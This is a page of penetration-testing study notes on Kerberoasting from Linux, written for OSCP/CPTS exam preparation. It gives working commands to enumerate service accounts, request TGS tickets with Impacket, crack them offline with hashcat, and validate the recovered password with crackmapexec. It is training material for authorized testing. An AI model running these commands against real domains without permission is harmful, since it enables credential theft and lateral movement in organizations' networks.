OSCP-CPTS NOTES
TwitterGithubLinkedinInstagramDiscord
  • oscp-cpts-notes
  • Pivoting & Tunneling
    • Local Port Forwarding
    • Remote Port Forwarding
    • Dynamic Port Forwarding
    • Ligolo-ng
  • Linux Privilege Escalation
    • Gathering Information of the System
    • Capabilities
    • Group Based
    • SUID Privilege Escalation
    • Cron Job
    • Exploiting NFS weak Permission
    • Sudo + LD_PRELOAD (Shared Libraries)
    • Shared Object Manipulation
    • Python Library Hijacking
  • Windows Privilege Escalation
    • Gathering Information of the System
    • User Privileges
      • SeImpersonatePrivilege and SeAssignPrimaryToken
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
    • Group Privileges
      • Backup Operators
      • DnsAdmins
      • Server Operators
      • Always Install Elevated
      • Print Operators
      • Event Log Readers
      • Hyper-V Administrators
    • Credential Theft
  • Active Directory Attacks
    • Enumeration
    • Initial Foothold
    • Gathering Users & Password Policies
    • Password Spraying
    • Credentialed Enumeration From Linux
    • Credentialed Enumeration From Windows
    • Kerberoasting - From Linux
    • Kerberoasting - From Windows
  • Beyond OSCP - CPTS
    • RED TEAMING
      • Windows Local Persistence
        • Tampering With Unprivileged Accounts
        • Backdooring Files
        • Abusing Services
        • Abusing Scheduled Tasks
        • Logon Triggered Persistence
        • Backdooring the Login Screen / RDP
        • Persisting Through Existing Services
Powered by GitBook
On this page
  • Kerberoasting Attack Process
  • Step 1: Fix Clock Skew Error
  • Prerequisites
  • Target of the Attack

Was this helpful?

Edit on GitHub
  1. Active Directory Attacks

Kerberoasting - From Linux

PreviousCredentialed Enumeration From WindowsNextKerberoasting - From Windows

Last updated 1 month ago

Was this helpful?

Kerberoasting Attack Process

Step 1: Fix Clock Skew Error

To fix the clock skew error, use the following commands:

timedatectl set-ntp off
sudo ntpdate 192.168.10.20

Prerequisites

A prerequisite for performing Kerberoasting attacks is having domain user credentials (either cleartext or an NTLM hash, if using Impacket), a shell in the context of a domain user account, or a high-privileged account like SYSTEM. Once you gain this level of access, you can start. You also need to identify the Domain Controller within the domain to query it.

Target of the Attack

This attack targets Service Principal Names (SPN) accounts.

SPNs are unique identifiers that Kerberos uses to map a service instance to a service account in whose context the service is running.

Any domain user can request a Kerberos ticket for any service account in the same domain.

Depending on your position in a network, this attack can be performed in multiple ways:

  • From a non-domain joined Linux host using valid domain user credentials.

  • From a domain-joined Linux host as root after retrieving the keytab file.

  • From a domain-joined Windows host authenticated as a domain user.

  • From a domain-joined Windows host with a shell in the context of a domain account.

  • As SYSTEM on a domain-joined Windows host.

Commands

  • Impacket-GetUserSPNs.py -dc-ip 192.168.10.20 DOMAIN.LOCAL/dollarboysushil → list SPN accounts

  • Impacket-GetUserSPNs.py -dc-ip 192.168.10.20 DOMAIN.LOCAL/dollarboysushil -request → Requesting all TGS tickets

  • Impacket-GetUserSPNs.py -dc-ip 192.168.10.20 DOMAIN.LOCAL/dollarboysushil -request-user sqldev → Requesting a single TGS ticket.

We can use -outputfile filename flag to save the TGS ticket in a file.

  • hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt → Cracking Ticket offline using Hashcat

  • sudo crackmapexec smb 192.168.10.20 -u sqldev -p database! → Testing authentication against a domain controller

From a non-domain joined Windows host using /netonly.

runas